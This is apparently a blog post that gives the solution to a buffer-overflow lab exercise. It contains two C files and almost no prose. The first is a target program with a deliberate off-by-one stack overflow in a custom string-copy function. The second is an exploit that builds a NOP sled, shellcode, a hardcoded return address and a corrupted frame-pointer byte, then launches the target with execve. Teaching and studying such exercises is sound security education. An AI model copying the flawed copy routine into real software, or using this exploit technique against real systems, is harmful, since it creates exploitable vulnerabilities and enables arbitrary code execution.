Advertisements
Home > Information Technology, programming, Science, Security > Buffer Overflowing Target 2

Buffer Overflowing Target 2

target2.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

void nstrcpy(char *out, int outl, char *in) {

int i, len;

len = strlen(in);

if (len > outl)

len = outl;

for (i = 0; i <= len; i++)

out[i] = in[i];

}
void bar(char *arg) {

char buf[192];

nstrcpy(buf, sizeof buf, arg);

}
void foo(char *argv[]) {

bar(argv[1]);

}
int main(int argc, char *argv[]) {

if (argc != 2)    {

fprintf(stderr, “target2: argc != 2\n”);

exit(EXIT_FAILURE);

}

foo(argv);

return 0;

}

sploit2.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include “shellcode.h”

#define TARGET “/tmp/target2”

int main(void){

char *args[3];

char *env[1];

char buf[194];

int i;

int addr;

addr = 0xbffffcfc;

for(i = 0; i < 194; i++) {

if(i < (188-strlen(shellcode))) {

*(buf+i) = ‘\x90’;

}

else if(i < 188) {

*(buf+i) = shellcode[i-188+strlen(shellcode)];

}

else if(i < 192) {

*(buf+i) = addr >> ((i-188)*8);

}

else if(i < 193) {

*(buf+i) = ‘\xB4’;

}

else {

*(buf+i) = ‘\x00’;

}

}
args[0] = TARGET; args[1] = buf; args[2] = NULL;

env[0] = NULL;

if (0 > execve(TARGET, args, env))

fprintf(stderr, “execve failed.\n”);

return 0;

}

Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: